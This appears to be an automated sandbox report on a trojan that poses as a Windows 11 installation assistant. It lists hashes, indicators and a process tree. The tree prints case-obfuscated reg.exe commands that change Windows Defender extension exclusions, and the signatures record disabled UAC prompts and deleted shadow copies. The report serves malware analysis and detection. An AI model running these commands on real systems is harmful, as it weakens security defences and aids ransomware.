Analysis
-
max time kernel
150s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-11-2024 23:57
Static task
static1
Behavioral task
behavioral1
Sample
Trojan.Win32.DelShad.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Trojan.Win32.DelShad.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Trojan.Win32.DelShad.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral4
Sample
Trojan.Win32.DelShad.exe
Resource
win11-20241007-en
General
-
Target
Trojan.Win32.DelShad.exe
-
Size
30.2MB
-
MD5
52cc1d2fbc403848c18f3c95dd63d727
-
SHA1
9c5067b86ffc4ab6908aea7d9adf0b82353db3af
-
SHA256
a9883030a711aebd2ec7faff0091135ee590a0e6ac613a963f55e43edc00c595
-
SHA512
7e59c7ae07bca570ce162633cfac5817bc6f012168afa3a24def0c95fef3c3251648a560761e9d967db36b31e437dbd2ed2ac884d62d4c4ee61a808a830754a0
-
SSDEEP
393216:jQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37Xq:cj8579oIIaj8579oIIaj8579oIIF
Malware Config
Signatures
-
Processes:
reg.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1" reg.exe Key created \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions reg.exe -
Processes:
reg.exereg.exereg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" reg.exe -
Processes:
rEg.EXErEg.EXErEG.EXEdescription ioc Process Key created \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns rEg.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\Cmd = "0" rEg.EXE Key created \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns rEg.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\EXE = "0" rEg.EXE Key created \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs rEG.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs rEG.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\SCr = "0" rEG.EXE -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables use of System Restore points 1 TTPs
-
Drops file in Drivers directory 1 IoCs
Processes:
cmd.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Windows11InstaIIation.sCrdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Windows11InstaIIation.sCr -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Trojan.Win32.DelShad.tmpWScript.exeWindows11InstaIIation.sCrdescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation Trojan.Win32.DelShad.tmp Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation Windows11InstaIIation.sCr -
Drops startup file 1 IoCs
Processes:
Trojan.Win32.DelShad.tmpdescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk Trojan.Win32.DelShad.tmp -
Executes dropped EXE 17 IoCs
Processes:
Trojan.Win32.DelShad.tmpTrojan.Win32.DelShad.tmppik.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exeWindows11InstaIIation.scrWindows11InstaIIation.sCrpid Process 944 Trojan.Win32.DelShad.tmp 4104 Trojan.Win32.DelShad.tmp 4212 pik.exe 5020 rp.exe 4232 rp.exe 4056 rp.exe 1844 rp.exe 1180 rp.exe 3720 rp.exe 4968 rp.exe 1636 rp.exe 1812 rp.exe 4856 rp.exe 4208 rp.exe 4628 rp.exe 2516 Windows11InstaIIation.scr 1500 Windows11InstaIIation.sCr -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
icacls.exeicacls.exepid Process 1880 icacls.exe 4060 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 19 ipINFO.io -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Windows11InstaIIation.scrdescription pid Process procid_target PID 2516 set thread context of 1500 2516 Windows11InstaIIation.scr 193 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
taskkill.exerp.exerp.execmd.exeWindows11InstaIIation.scrcurl.exeWindows11InstaIIation.sCrrp.exerp.exerp.exerp.exerp.exepowershell.exeTrojan.Win32.DelShad.tmprp.exerp.execmd.exerp.exerp.exeTrojan.Win32.DelShad.exeTrojan.Win32.DelShad.tmpTrojan.Win32.DelShad.execmd.exerp.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows11InstaIIation.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows11InstaIIation.sCr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan.Win32.DelShad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rp.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
find.exefind.exepid Process 3816 find.exe 832 find.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Windows11InstaIIation.sCrdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Windows11InstaIIation.sCr -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
Windows11InstaIIation.sCrdescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion Windows11InstaIIation.sCr Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Windows11InstaIIation.sCr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Windows11InstaIIation.sCr -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid Process 1624 vssadmin.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 2940 taskkill.exe -
Modifies data under HKEY_USERS 20 IoCs
Processes:
rp.exerp.exerp.exerp.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rp.exe -
Suspicious behavior: EnumeratesProcesses 58 IoCs
Processes:
Trojan.Win32.DelShad.tmprp.exerp.exerp.exerp.exerp.exerp.exerp.exerp.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 4104 Trojan.Win32.DelShad.tmp 4104 Trojan.Win32.DelShad.tmp 5020 rp.exe 5020 rp.exe 5020 rp.exe 5020 rp.exe 4056 rp.exe 4056 rp.exe 4056 rp.exe 4056 rp.exe 4232 rp.exe 4232 rp.exe 4232 rp.exe 4232 rp.exe 1844 rp.exe 1844 rp.exe 1844 rp.exe 1844 rp.exe 3720 rp.exe 3720 rp.exe 3720 rp.exe 3720 rp.exe 1636 rp.exe 1636 rp.exe 1636 rp.exe 1636 rp.exe 1812 rp.exe 1812 rp.exe 1812 rp.exe 1812 rp.exe 4208 rp.exe 4208 rp.exe 4208 rp.exe 4208 rp.exe 3720 powershell.exe 3720 powershell.exe 3720 powershell.exe 3836 powershell.exe 3836 powershell.exe 3836 powershell.exe 4168 powershell.exe 4168 powershell.exe 1552 powershell.exe 1552 powershell.exe 1680 powershell.exe 1680 powershell.exe 1568 powershell.exe 1568 powershell.exe 3640 powershell.exe 3640 powershell.exe 2624 powershell.exe 2624 powershell.exe 4380 powershell.exe 4380 powershell.exe 1836 powershell.exe 1836 powershell.exe 4208 powershell.exe 4208 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exepik.exevssvc.exeWMIC.exemsiexec.exerp.exerp.exerp.exerp.exerp.exedescription pid Process Token: SeDebugPrivilege 2940 taskkill.exe Token: SeDebugPrivilege 4212 pik.exe Token: SeBackupPrivilege 3652 vssvc.exe Token: SeRestorePrivilege 3652 vssvc.exe Token: SeAuditPrivilege 3652 vssvc.exe Token: SeIncreaseQuotaPrivilege 3352 WMIC.exe Token: SeSecurityPrivilege 3352 WMIC.exe Token: SeTakeOwnershipPrivilege 3352 WMIC.exe Token: SeLoadDriverPrivilege 3352 WMIC.exe Token: SeSystemProfilePrivilege 3352 WMIC.exe Token: SeSystemtimePrivilege 3352 WMIC.exe Token: SeProfSingleProcessPrivilege 3352 WMIC.exe Token: SeIncBasePriorityPrivilege 3352 WMIC.exe Token: SeCreatePagefilePrivilege 3352 WMIC.exe Token: SeBackupPrivilege 3352 WMIC.exe Token: SeRestorePrivilege 3352 WMIC.exe Token: SeShutdownPrivilege 3352 WMIC.exe Token: SeDebugPrivilege 3352 WMIC.exe Token: SeSystemEnvironmentPrivilege 3352 WMIC.exe Token: SeRemoteShutdownPrivilege 3352 WMIC.exe Token: SeUndockPrivilege 3352 WMIC.exe Token: SeManageVolumePrivilege 3352 WMIC.exe Token: 33 3352 WMIC.exe Token: 34 3352 WMIC.exe Token: 35 3352 WMIC.exe Token: 36 3352 WMIC.exe Token: SeIncreaseQuotaPrivilege 3352 WMIC.exe Token: SeSecurityPrivilege 3352 WMIC.exe Token: SeTakeOwnershipPrivilege 3352 WMIC.exe Token: SeLoadDriverPrivilege 3352 WMIC.exe Token: SeSystemProfilePrivilege 3352 WMIC.exe Token: SeSystemtimePrivilege 3352 WMIC.exe Token: SeProfSingleProcessPrivilege 3352 WMIC.exe Token: SeIncBasePriorityPrivilege 3352 WMIC.exe Token: SeCreatePagefilePrivilege 3352 WMIC.exe Token: SeBackupPrivilege 3352 WMIC.exe Token: SeRestorePrivilege 3352 WMIC.exe Token: SeShutdownPrivilege 3352 WMIC.exe Token: SeDebugPrivilege 3352 WMIC.exe Token: SeSystemEnvironmentPrivilege 3352 WMIC.exe Token: SeRemoteShutdownPrivilege 3352 WMIC.exe Token: SeUndockPrivilege 3352 WMIC.exe Token: SeManageVolumePrivilege 3352 WMIC.exe Token: 33 3352 WMIC.exe Token: 34 3352 WMIC.exe Token: 35 3352 WMIC.exe Token: 36 3352 WMIC.exe Token: SeSecurityPrivilege 4356 msiexec.exe Token: SeDebugPrivilege 5020 rp.exe Token: SeAssignPrimaryTokenPrivilege 5020 rp.exe Token: SeIncreaseQuotaPrivilege 5020 rp.exe Token: 0 5020 rp.exe Token: SeDebugPrivilege 4232 rp.exe Token: SeAssignPrimaryTokenPrivilege 4232 rp.exe Token: SeIncreaseQuotaPrivilege 4232 rp.exe Token: SeDebugPrivilege 4056 rp.exe Token: SeAssignPrimaryTokenPrivilege 4056 rp.exe Token: SeIncreaseQuotaPrivilege 4056 rp.exe Token: 0 4056 rp.exe Token: SeDebugPrivilege 1844 rp.exe Token: SeAssignPrimaryTokenPrivilege 1844 rp.exe Token: SeIncreaseQuotaPrivilege 1844 rp.exe Token: SeDebugPrivilege 3720 rp.exe Token: SeAssignPrimaryTokenPrivilege 3720 rp.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Trojan.Win32.DelShad.tmppid Process 4104 Trojan.Win32.DelShad.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Windows11InstaIIation.scrpid Process 2516 Windows11InstaIIation.scr -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Trojan.Win32.DelShad.exeTrojan.Win32.DelShad.tmpTrojan.Win32.DelShad.exeTrojan.Win32.DelShad.tmpWScript.execmd.exedescription pid Process procid_target PID 4544 wrote to memory of 944 4544 Trojan.Win32.DelShad.exe 88 PID 4544 wrote to memory of 944 4544 Trojan.Win32.DelShad.exe 88 PID 4544 wrote to memory of 944 4544 Trojan.Win32.DelShad.exe 88 PID 944 wrote to memory of 2388 944 Trojan.Win32.DelShad.tmp 89 PID 944 wrote to memory of 2388 944 Trojan.Win32.DelShad.tmp 89 PID 944 wrote to memory of 2388 944 Trojan.Win32.DelShad.tmp 89 PID 2388 wrote to memory of 4104 2388 Trojan.Win32.DelShad.exe 90 PID 2388 wrote to memory of 4104 2388 Trojan.Win32.DelShad.exe 90 PID 2388 wrote to memory of 4104 2388 Trojan.Win32.DelShad.exe 90 PID 4104 wrote to memory of 2940 4104 Trojan.Win32.DelShad.tmp 91 PID 4104 wrote to memory of 2940 4104 Trojan.Win32.DelShad.tmp 91 PID 4104 wrote to memory of 2940 4104 Trojan.Win32.DelShad.tmp 91 PID 4104 wrote to memory of 4212 4104 Trojan.Win32.DelShad.tmp 94 PID 4104 wrote to memory of 4212 4104 Trojan.Win32.DelShad.tmp 94 PID 208 wrote to memory of 552 208 WScript.exe 98 PID 208 wrote to memory of 552 208 WScript.exe 98 PID 552 wrote to memory of 4680 552 cmd.exe 100 PID 552 wrote to memory of 4680 552 cmd.exe 100 PID 552 wrote to memory of 4952 552 cmd.exe 101 PID 552 wrote to memory of 4952 552 cmd.exe 101 PID 552 wrote to memory of 2952 552 cmd.exe 102 PID 552 wrote to memory of 2952 552 cmd.exe 102 PID 552 wrote to memory of 2868 552 cmd.exe 103 PID 552 wrote to memory of 2868 552 cmd.exe 103 PID 552 wrote to memory of 5080 552 cmd.exe 104 PID 552 wrote to memory of 5080 552 cmd.exe 104 PID 552 wrote to memory of 748 552 cmd.exe 105 PID 552 wrote to memory of 748 552 cmd.exe 105 PID 552 wrote to memory of 2816 552 cmd.exe 106 PID 552 wrote to memory of 2816 552 cmd.exe 106 PID 552 wrote to memory of 5012 552 cmd.exe 107 PID 552 wrote to memory of 5012 552 cmd.exe 107 PID 552 wrote to memory of 4856 552 cmd.exe 108 PID 552 wrote to memory of 4856 552 cmd.exe 108 PID 552 wrote to memory of 2852 552 cmd.exe 109 PID 552 wrote to memory of 2852 552 cmd.exe 109 PID 552 wrote to memory of 2180 552 cmd.exe 110 PID 552 wrote to memory of 2180 552 cmd.exe 110 PID 552 wrote to memory of 2212 552 cmd.exe 111 PID 552 wrote to memory of 2212 552 cmd.exe 111 PID 552 wrote to memory of 1572 552 cmd.exe 112 PID 552 wrote to memory of 1572 552 cmd.exe 112 PID 552 wrote to memory of 5044 552 cmd.exe 113 PID 552 wrote to memory of 5044 552 cmd.exe 113 PID 552 wrote to memory of 4484 552 cmd.exe 114 PID 552 wrote to memory of 4484 552 cmd.exe 114 PID 552 wrote to memory of 2704 552 cmd.exe 115 PID 552 wrote to memory of 2704 552 cmd.exe 115 PID 552 wrote to memory of 1184 552 cmd.exe 116 PID 552 wrote to memory of 1184 552 cmd.exe 116 PID 552 wrote to memory of 2804 552 cmd.exe 117 PID 552 wrote to memory of 2804 552 cmd.exe 117 PID 552 wrote to memory of 4904 552 cmd.exe 118 PID 552 wrote to memory of 4904 552 cmd.exe 118 PID 552 wrote to memory of 4232 552 cmd.exe 119 PID 552 wrote to memory of 4232 552 cmd.exe 119 PID 552 wrote to memory of 3444 552 cmd.exe 120 PID 552 wrote to memory of 3444 552 cmd.exe 120 PID 552 wrote to memory of 1156 552 cmd.exe 121 PID 552 wrote to memory of 1156 552 cmd.exe 121 PID 552 wrote to memory of 5116 552 cmd.exe 122 PID 552 wrote to memory of 5116 552 cmd.exe 122 PID 552 wrote to memory of 4244 552 cmd.exe 123 PID 552 wrote to memory of 4244 552 cmd.exe 123 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp"C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp" /SL5="$70050,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp"C:\Users\Admin\AppData\Local\Temp\is-HIRIH.tmp\Trojan.Win32.DelShad.tmp" /SL5="$80050,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-4⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\pik.exe"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\pik.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\.cmd""5⤵
- System Location Discovery: System Language Discovery
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exerp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020 -
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4232 -
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1180 -
C:\Windows\system32\rEG.EXE"C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F9⤵
- Windows security bypass
PID:3540
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exerP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056 -
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844 -
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4968 -
C:\Windows\system32\rEg.EXE"C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f9⤵
- Windows security bypass
PID:4476
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exerP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3720 -
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1636 -
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
